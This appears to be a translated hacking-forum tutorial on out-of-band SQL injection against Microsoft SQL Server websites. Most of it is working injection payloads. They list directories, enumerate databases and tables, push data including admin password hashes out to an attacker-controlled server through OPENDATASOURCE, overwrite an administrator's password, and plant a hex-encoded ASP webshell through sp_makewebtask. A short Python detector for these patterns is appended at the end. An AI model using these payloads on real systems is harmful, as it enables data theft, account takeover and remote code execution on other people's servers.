Mssql rebound injection recording collection

Source: Internet
Author: User

One night, while I was studying an SA injection point, Hua B sent me some information, so I am posting a record. Getting a shell is getting harder and harder.

Change the administrator password

';update [user] set [pwd]='1519804e89226cf9893a05d9e3fc8bbb' where [LogonName]='hmingming';--

-----------------------------
List a directory
create database test (run locally to create the database)

(Run locally to create the table and its fields in the TEST database just created)

use test
create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255))

-------------------------------------------------------
Test whether the injection point can connect to the local database (executed at the injection point)

insert into openrowset('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima','select id from test.dbo.temp1') select name from master.dbo.sysdatabases--

netstat -an | find "1433" (run locally to watch for the incoming connection)

create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255))--
(Run locally in the query analyzer, in the database test)

'; drop table temp--   (executed at the injection point, to avoid a conflict with an existing table)
_________________________________________________________________________________
(Executed at the injection point to create the table and fields, so the statements below have somewhere to insert into)
'; create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255))--

---------------------------------------------------

'; insert into temp (id, num1, num2) exec master.dbo.xp_dirtree 'd:\www\jiage\', 1, 1--

(Executed at the injection point; the directory listing is inserted into the TEMP table)
------------------------
(Executed at the injection point; copies the directory listing into the TEMP1 table of the test database)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=test').test.dbo.temp1 select * from temp--

______________________________________________________________
select * from temp1 (run locally; lists the directory)

'; delete temp--   (executed at the injection point to clear the data table)

delete temp1 (run locally in the query analyzer to clear the data table)

A dig at Black Hand Peng Chao: select * from temp-- was actually written as select temp from temp--
------------------------------
Guess tables
(The following statements are all executed locally)
create database lcx (create the database)

create table ku (name nvarchar(256) null); (Create a table so the query below can copy the database names into it)

create table biao (id int null, name nvarchar(256) null); (Create a table so the query below can copy the table names into it.

nvarchar is the data type, 256 is the data length, and null means the column may be left empty. Spelled out so newbies can follow it; remember, I am a newbie too.)

____________________________________________________________________________
(Executed at the injection point to copy all the database names of the queried server into the newly created ku table; then look at the rows returned from the "ku" table in the lcx database)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases--

__________________________________________________________________________
(Executed at the injection point to get the current database name. Before running it, clear the leftovers from the previous statement locally. What, you did not? My god: run delete ku in the local query analyzer, switched to the lcx database)

';Insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.ku select db_name(0)--

__________________________________________________________________________________
(Executed at the injection point to copy the names of all the tables in the current database into the newly created biao table; then check locally whether the biao table in the lcx database returned all the rows)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.biao select [id],[name] from sysobjects where xtype='U'--

___________________________________________________________________
(If the cross-database query returns nothing, it is because cross-database queries are not permitted)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.biao select [id],[name] from JIAGE%23@HL0212_Week.dbo.sysobjects where xtype='U'--

OK (we have the database and the tables; next we want to guess the contents? If you want some vitamin candy, follow me)

_________________________________________________________________________
(Run locally in the query analyzer, in the LCX database: copies the structure of the system table syscolumns into tmpcolumns, so the results of the statements below can be copied into the tmpcolumns table)
select * into [tmpcolumns] from syscolumns where 1=2--
_________________________________________________________
(Executed at the injection point. First, an explanation: id = 558625033 is the object id of the table named user, so this queries all the column names of the user table and copies them into tmpcolumns)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.tmpcolumns select * from syscolumns where id=558625033--

/ xtype value to data type:
When 34 then "image"
When 35 then "text"
When 52 then "smallint"
When 56 then "int"
When 61 then "datetime"
When 62 then "float"
When 108 then "numeric"
When 167 then "varchar"
When 175 then "char"
When 231 then "nvarchar"
/

create table caonima([LogonTime] datetime null,[pwd] varchar(200) NULL,[name] varchar(200) null,[LogonName] varchar(200) null,[ZipCode] varchar(200) null);

(Run locally in the query analyzer. What is the difference between this table creation and the earlier ones? Actually none, but it is better to write it this way.

Note that it is best to give the table a name other than user; do not name it user casually, because the system may already have a table with that name and it will conflict.

This table is not created at random, so follow me: first open the table tmpcolumns and read it carefully.

If the xtype of pwd is 167, its data type is varchar, and the length column that follows is its length.

Is the explanation clear enough? It is not easy for me either!)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.caonima select LogonTime,pwd,name,LogonName,ZipCode from [user]--

(Executed at the injection point; copies the query results into the newly created caonima table. Why only three fields queried?

Because the others are not sensitive information! That is also why only these column names were created above, to correspond with this statement.

Note that the query order must match the field order of the created table.)

Okay, so far we have the administrator's username and password; what remains is cracking the administrator's 32-character MD5 hash.

Cannot crack it? Cmd5.com charges money? Me? Sorry, just change the password.

';update [user] set [pwd]='1519804e89226cf9893a05d9e3fc8bbb' where [LogonName]='hmingming';--

(Change the administrator password at the injection point, setting the pwd of the administrator named hmingming to the md5 value below.

Password 2264964 = 1519804e89226cf9893a05d9e3fc8bbb)

Okay. With the method above we got the administrator password and username. Shall we log on to his back end? LET'S FUCK

Cannot find the back-end path? Look at the directory listing from the top.

Getting a SHELL from the back end is your own business; I only teach how to get into the back end. If you still cannot get in...... endure it!

Well, it took me a day to piece together the spam above. It was very hard. Those with money, chip in money; those without, chip in a cheer.

This was forced on me by the administrator: the website path had already been obtained, but backup log was not allowed,

and according to boss Gao that permission had been locked down. So, with this article: never do this unless you have to,

it will wear you out. Unless the target website has a grudge against you. A few other bits of nonsense: dress warmly in the cold weather.

Note: The above method is used when the target IIS suppresses errors and nothing is reported. Pay special attention:

the server belongs to my big brother, do not touch my server. The username and password of the local machine must be written into the connection string.

SA permission is the premise of this whole nonsense, so it is for those working with SA permission.
PS: The boss said there is a rebound injection tool, but with echo disabled and no errors reported the tool was useless;

I do not think a rebound injection tool is needed for speed.

drop table cmd--create table cmd(a char(255))--Insert into cmd(a) values (0x3C254576616C20526571756573742822232229253E)--execute sp_makewebtask @outputfile='D:\www\jiage\test.asp',@query='select a from cmd'--

The above seems to be executable only by SA; whether DB can execute it is unknown.

Use this trick when BACKUP LOG does not work.
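Added here as a defender's example, not part of the original post: a Python check run over constructed statement lines, as a SQL Server audit trace of the web application's login might record them, that flags the primitives the whole procedure above relies on: OPENROWSET/OPENDATASOURCE carrying an embedded server= connection string (the out-of-band insert), xp_dirtree, sp_makewebtask, catalog enumeration, and quote-terminated stacked statements. The sample lines, the APP_USER login and the 203.0.113.5 address are constructed.

```python
import re

# Constructed sample of statement text as an audit trace of the web
# application's SQL login might record it.  Three lines reproduce the
# patterns used in the write-up above; two are ordinary queries.
SAMPLE_STATEMENTS = [
    "select id, name from product where id = 42",
    "'; insert into opendatasource('sqloledb','server=203.0.113.5,1433;"
    "uid=APP_USER;pwd=EXAMPLE;database=lcx').lcx.dbo.ku "
    "select name from master.dbo.sysdatabases--",
    "'; insert into temp(id,num1,num2) exec master.dbo.xp_dirtree 'd:\\www\\',1,1--",
    "select count(*) from [user] where LogonName = 'hmingming'",
    "exec sp_makewebtask @outputfile='D:\\www\\test.asp',@query='select a from cmd'--",
]

# (tag, pattern).  Case-insensitive; re.S lets '.*' span embedded newlines.
RULES = [
    # OPENROWSET/OPENDATASOURCE whose argument carries a server= connection
    # string: the statement itself names an external server to push rows to.
    ("outbound_linked_query",
     re.compile(r"open(?:rowset|datasource)\s*\(.*?server\s*=", re.I | re.S)),
    # Directory listing of the web root; an application login has no use for it.
    ("xp_dirtree", re.compile(r"\bxp_dirtree\b", re.I)),
    # Legacy write-query-results-to-file procedure.
    ("sp_makewebtask", re.compile(r"\bsp_makewebtask\b", re.I)),
    # Enumeration of system catalogs (databases, tables, columns).
    ("catalog_enumeration",
     re.compile(r"\b(?:master\.dbo\.)?sys(?:databases|objects|columns)\b", re.I)),
    # Quote-terminated stacked statement with a trailing comment.
    ("stacked_statement", re.compile(r"^\s*'\s*;.*--\s*$", re.S)),
]


def classify(statement: str) -> list[str]:
    """Return the tags of every rule that fires on one captured statement."""
    return [tag for tag, rx in RULES if rx.search(statement)]


def scan(statements) -> list[tuple[int, list[str]]]:
    """Return (index, tags) for each statement that triggers at least one rule."""
    hits = []
    for i, stmt in enumerate(statements):
        tags = classify(stmt)
        if tags:
            hits.append((i, tags))
    return hits


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_STATEMENTS):
        print(f"statement {idx}: {', '.join(tags)}")
```

The out-of-band inserts these rules match only work on a server where the Ad Hoc Distributed Queries option is enabled (it is off by default on modern versions), so the sp_configure setting is the server-side check to pair with this.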
